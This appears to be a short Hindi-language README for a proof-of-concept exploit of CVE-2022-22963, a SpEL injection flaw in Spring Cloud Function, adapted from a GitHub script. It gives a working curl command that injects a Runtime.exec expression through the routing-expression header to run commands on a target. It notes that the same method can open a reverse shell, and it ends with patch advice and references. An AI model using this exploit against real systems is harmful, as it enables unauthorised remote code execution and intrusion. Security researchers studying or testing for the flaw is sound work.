
CVE-2022-22963 (Spring Cloud Function SpEL injection) के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, डिटेक्शन स्क्रिप्ट और curl-आधारित RCE पेलोड जनरेशन के साथ।
CVE-2022-22963 PoC
अंग्रेजी अनुवाद और पता लगाने के लिए थोड़ा संशोधित https://github.com/chaosec2021/Spring-cloud-function-SpEL-RCE/blob/main/Spel_RCE_POC.py । डिफ़ॉल्ट रूप से लक्ष्य पर whoami चलाया जाता है और एक फ़ाइल vulnerable.txt बनाई जाती है जिसमें संवेदनशील URLs होते हैं।
इस कमजोरी का शोषण करना काफी आसान है। यहाँ शोषण के लिए कर्ल कमांड दिया गया है।
curl -i -s -k -X $'POST' -H $'Host: 192.168.1.2:8080' -H $'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("touch /tmp/test")' --data-binary $'exploit_poc' $'http://192.168.1.2:8080/functionRouter'
इस कर्ल के साथ ऑपरेटिंग सिस्टम पर एक फ़ाइल बनाना आसान है, लेकिन इसका उपयोग कमजोर होस्ट या कंटेनर पर रिवर्स शेल खोलने के लिए किया जा सकता है।
यदि आप CVE-2022-22963 से प्रभावित हैं, तो आपको एप्लिकेशन को नवीनतम संस्करण 3.1.7 और 3.2.3 में अपडेट करना चाहिए।
https://www.cyberkendra.com/2022/03/rce-0-day-exploit-found-in-spring-cloud.html, https://github.com/spring-cloud/spring-cloud-function/commit/dc5128b80c6c04232a081458f637c81a64fa9b52